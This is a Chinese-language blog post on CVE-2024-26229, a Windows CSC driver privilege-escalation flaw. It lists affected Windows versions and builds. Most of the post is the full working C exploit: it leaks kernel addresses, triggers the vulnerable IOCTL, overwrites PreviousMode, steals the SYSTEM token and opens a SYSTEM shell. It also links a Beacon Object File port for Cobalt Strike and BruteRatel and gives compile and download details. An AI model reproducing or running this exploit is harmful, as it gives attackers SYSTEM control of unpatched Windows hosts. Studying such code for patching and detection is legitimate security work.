CVE-2024-26229 Windows CSC提权漏洞 exp

发布时间: 2024-07-18

CVE-2024-26229漏洞描述

Windows CSC服务特权提升漏洞。

当程序向缓冲区写入的数据超出其处理能力时,就会发生基于堆的缓冲区溢出,从而导致多余的数据溢出到相邻的内存区域。这种溢出会损坏内存,并可能使攻击者能够执行任意代码或未经授权访问系统。本质上,攻击者可以编写触发溢出的恶意代码或输入,从而控制受影响的系统、执行任意命令、安装恶意软件或访问敏感数据。

微软已发出警告成功利用此漏洞的攻击者可以获得 SYSTEM 权限,这是 Windows 系统上的最高访问级别。这增加了与 CVE-2024-26229 相关的风险,使其成为恶意行为者的主要目标。

受影响的系统列表

Windows Server 2022, 23H2 Edition (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2012
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1607 for 32-bit Systems
Windows 10 for x64-based Systems
Windows 10 for 32-bit Systems
Windows 11 Version 23H2 for x64-based Systems
Windows 11 Version 23H2 for ARM64-based Systems
Windows 10 Version 22H2 for 32-bit Systems
Windows 10 Version 22H2 for ARM64-based Systems
Windows 10 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for ARM64-based Systems
Windows 10 Version 21H2 for x64-based Systems
Windows 10 Version 21H2 for ARM64-based Systems
Windows 10 Version 21H2 for 32-bit Systems
Windows 11 version 21H2 for ARM64-based Systems
Windows 11 version 21H2 for x64-based Systems
Windows Server 2012 R2 (Server Core installation)
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems

详细列表

序号 受影响的系统 版本号
1 Windows Server 2022, 23H2 Edition (Server Core installation) 10.0.25398.830
2 Windows Server 2012 R2 6.3.9600.21924
3 Windows Server 2012 (Server Core installation) 6.2.9200.24821
4 Windows Server 2012 6.2.9200.24821
5 Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) 6.1.7601.27067
6 Windows Server 2008 R2 for x64-based Systems Service Pack 1 6.1.7601.27067
7 Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) 6.0.6003.22618
8 Windows Server 2008 for x64-based Systems Service Pack 2 6.0.6003.22618
9 Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) 6.0.6003.22618
10 Windows Server 2008 for 32-bit Systems Service Pack 2 6.0.6003.22618
11 Windows Server 2016 (Server Core installation) 10.0.14393.6897
12 Windows Server 2016 10.0.14393.6897
13 Windows 10 Version 1607 for x64-based Systems 10.0.14393.6897
14 Windows 10 Version 1607 for 32-bit Systems 10.0.14393.6897
15 Windows 10 for x64-based Systems 10.0.10240.20596
16 Windows 10 for 32-bit Systems 10.0.10240.20596
17 Windows 11 Version 23H2 for x64-based Systems 10.0.22631.3447
18 Windows 11 Version 23H2 for ARM64-based Systems 10.0.22631.3447
19 Windows 10 Version 22H2 for 32-bit Systems 10.0.19045.4291
20 Windows 10 Version 22H2 for ARM64-based Systems 10.0.19045.4291
21 Windows 10 Version 22H2 for x64-based Systems 10.0.19045.4291
22 Windows 11 Version 22H2 for x64-based Systems 10.0.22621.3447
23 Windows 11 Version 22H2 for ARM64-based Systems 10.0.22621.3447
24 Windows 10 Version 21H2 for x64-based Systems 10.0.19044.4291
25 Windows 10 Version 21H2 for ARM64-based Systems 10.0.19044.4291
26 Windows 10 Version 21H2 for 32-bit Systems 10.0.19044.4291
27 Windows 11 version 21H2 for ARM64-based Systems 10.0.22000.2899
28 Windows 11 version 21H2 for x64-based Systems 10.0.22000.2899
29 Windows Server 2012 R2 (Server Core installation) 6.3.9600.21924
30 Windows Server 2022 (Server Core installation) 10.0.20348.2402
31 Windows Server 2022 10.0.20348.2402
32 Windows Server 2019 (Server Core installation) 10.0.17763.5696
33 Windows Server 2019 10.0.17763.5696
34 Windows 10 Version 1809 for ARM64-based Systems 10.0.17763.5696
35 Windows 10 Version 1809 for x64-based Systems 10.0.17763.5696
36 Windows 10 Version 1809 for 32-bit Systems 10.0.17763.5696

微软公告

CVE-2024-26229

CVE-2024-26229 poc exp

CVE-2024-26229.c

https://github.com/varwara/CVE-2024-26229

#/* 
                PoC Info
-------------------------------------------
Vulnerability:    CVE-2024-26229
Environment:    Windows 11 22h2 Build 22621
-------------------------------------------
*/
#include <Windows.h>
#include <stdio.h>
#include <winternl.h>
#include <stdint.h>

// I use ntdllp.lib private library from VS SDK to avoid GetProcAddress for Nt* functions
#pragma comment(lib, "ntdllp.lib")
#define STATUS_SUCCESS 0

#define NtCurrentProcess() ((HANDLE)(LONG_PTR)-1)
#define EPROCESS_TOKEN_OFFSET            0x4B8
#define KTHREAD_PREVIOUS_MODE_OFFSET    0x232
#define CSC_DEV_FCB_XXX_CONTROL_FILE    0x001401a3 // vuln ioctl

#define SystemHandleInformation            0x10
#define SystemHandleInformationSize        0x400000 

enum _MODE
{
    KernelMode = 0,
    UserMode = 1
};

typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO
{
USHORT UniqueProcessId;
USHORT CreatorBackTraceIndex;
UCHAR ObjectTypeIndex;
UCHAR HandleAttributes;
USHORT HandleValue;
PVOID Object;
ULONG GrantedAccess;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO, *PSYSTEM_HANDLE_TABLE_ENTRY_INFO;

typedef struct _SYSTEM_HANDLE_INFORMATION
{
    ULONG NumberOfHandles;
    SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1];
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;


//
// Get the kernel object pointer for the specific process by it's handle
// 
int32_t GetObjPtr(_Out_ PULONG64 ppObjAddr, _In_ ULONG ulPid, _In_ HANDLE handle)

{
    int32_t Ret = -1;
    PSYSTEM_HANDLE_INFORMATION pHandleInfo = 0;
    ULONG ulBytes = 0;
    NTSTATUS Status = STATUS_SUCCESS;

    //
    // Handle heap allocations to overcome STATUS_INFO_LENGTH_MISMATCH
    //
    while ((Status = NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemHandleInformation, pHandleInfo, ulBytes, &ulBytes)) == 0xC0000004L)
    {
        if (pHandleInfo != NULL)
        {
            pHandleInfo = (PSYSTEM_HANDLE_INFORMATION)HeapReAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, pHandleInfo, (size_t)2 * ulBytes);
        }

        else
        {
            pHandleInfo = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, (size_t)2 * ulBytes);
        }
    }

    if (Status != NULL)
    {
        Ret = Status;
        goto done;
    }

    for (ULONG i = 0; i < pHandleInfo->NumberOfHandles; i++)
    {
        if ((pHandleInfo->Handles[i].UniqueProcessId == ulPid) && (pHandleInfo->Handles[i].HandleValue == (unsigned short)handle))
        {
            *ppObjAddr = (unsigned long long)pHandleInfo->Handles[i].Object;
            Ret = 0;
            break;
        }
    }

    done:
    if (pHandleInfo != NULL)
    {
        HeapFree(GetProcessHeap, 0, pHandleInfo);
    }
    return Ret;
}

//
// A wrapper to make arbitrary writes to the whole system memory address space
//
NTSTATUS Write64(_In_ uintptr_t *Dst, _In_ uintptr_t *Src, _In_ size_t Size)
{
    NTSTATUS Status = 0;
    size_t cbNumOfBytesWrite = 0;

    Status = NtWriteVirtualMemory(GetCurrentProcess(), Dst, Src, Size, &cbNumOfBytesWrite);
    if (!NT_SUCCESS(Status)) 
    {
        return -1;
    }
    return Status;
}

//
//
//
NTSTATUS Exploit()
{
    UNICODE_STRING  objectName = { 0 };
    OBJECT_ATTRIBUTES objectAttr = { 0 };
    IO_STATUS_BLOCK iosb = { 0 };
    HANDLE handle;
    NTSTATUS status = 0;

    //
    // Initialize kernel objects to leak
    //
    uintptr_t Sysproc = 0;
    uintptr_t Curproc = 0;
    uintptr_t Curthread = 0;
    uintptr_t Token = 0;

    HANDLE hCurproc = 0;
    HANDLE hThread = 0;
    uint32_t Ret = 0;
    uint8_t mode = UserMode;

    RtlInitUnicodeString(&objectName, L"\\Device\\Mup\\;Csc\\.\\.");
    InitializeObjectAttributes(&objectAttr, &objectName, 0, NULL, NULL);
    
    status = NtCreateFile(&handle, SYNCHRONIZE, &objectAttr, &iosb, NULL, FILE_ATTRIBUTE_NORMAL, 0, FILE_OPEN_IF, FILE_CREATE_TREE_CONNECTION, NULL, 0);
    if (!NT_SUCCESS(status))
    {
        printf("[-] NtCreateFile failed with status = %x\n", status);
        return status;
    }

    //
    // Leak System _EPROCESS kernel address
    // 
    Ret = GetObjPtr(&Sysproc, 4, 4);
    if (Ret != NULL)
    {
        return Ret;
    }
    printf("[+] System EPROCESS address = %llx\n", Sysproc);

    //
    // Leak current _KTHREAD kernel address
    //
    hThread = OpenThread(THREAD_QUERY_INFORMATION, TRUE, GetCurrentThreadId());
    if (hThread != NULL)
    {
        Ret = GetObjPtr(&Curthread, GetCurrentProcessId(), hThread);
        if (Ret != NULL)
        {
            return Ret;
        }
        printf("[+] Current THREAD address = %llx\n", Curthread);
    }

    //
    // Leak current _EPROCESS kernel address
    //
    hCurproc = OpenProcess(PROCESS_QUERY_INFORMATION, TRUE, GetCurrentProcessId());
    if (hCurproc != NULL)
    {
        Ret = GetObjPtr(&Curproc, GetCurrentProcessId(), hCurproc);
        if (Ret != NULL)
        {
            return Ret;
        }
        printf("[+] Current EPROCESS address = %llx\n", Curproc);
    }

    //
    // Sending the payload to the csc.sys driver to trigger the bug
    //
    status = NtFsControlFile(handle, NULL, NULL, NULL, &iosb, CSC_DEV_FCB_XXX_CONTROL_FILE, /*Vuln arg*/ (void*)(Curthread + KTHREAD_PREVIOUS_MODE_OFFSET - 0x18), 0, NULL, 0);
    if (!NT_SUCCESS(status))
    {
        printf("[-] NtFsControlFile failed with status = %x\n", status);
        return status;
    }

    printf("[!] Leveraging DKOM to achieve LPE\n");
    printf("[!] Calling Write64 wrapper to overwrite current EPROCESS->Token\n");
    
    Write64(Curproc + EPROCESS_TOKEN_OFFSET, Sysproc + EPROCESS_TOKEN_OFFSET, 0x8);

    //
    // Restoring KTHREAD->PreviousMode
    //
    Write64(Curthread + KTHREAD_PREVIOUS_MODE_OFFSET, &mode, 0x1);

    //
    // spawn the shell with "nt authority\system"
    //

    system("cmd.exe");

    return STATUS_SUCCESS;
}


int main()
{
    NTSTATUS status = 0;
    status = Exploit();

    return status;
}

CVE-2024-26229 Windows CSC提权漏洞 exp

CVE-2024-26229 BOF

NVISO的 CVE-2024-26229 针对 Cobalt Strike 和 BruteRatel 的Beacon 对象文件 (BOF) 实现。

https://github.com/NVISOsecurity/CVE-2024-26229-BOF

编译命令

gcc -c CVE-2024-26229-bof.c -o CVE-2024-26229-bof.o

CVE-2024-26229 Windows CSC提权漏洞 exp

CVE-2024-26229 Windows CSC提权漏洞 exp

该漏洞已于2024年4月9日修复,详情请参阅CVE-2024-26229

软件按原样提供。不期待任何后续更新。

测试

在win11 23H2 22631.3296上进行测试,成功提权。

CVE-2024-26229 Windows CSC提权漏洞 exp

 

CVE-2024-26229 Windows CSC提权漏洞 exp

致谢

该漏洞代码的所有版权均归原作者varwara所有。

下载地址

CVE-2024-26229-BOF.zip

请在下方留下您的评论.加入TG吹水群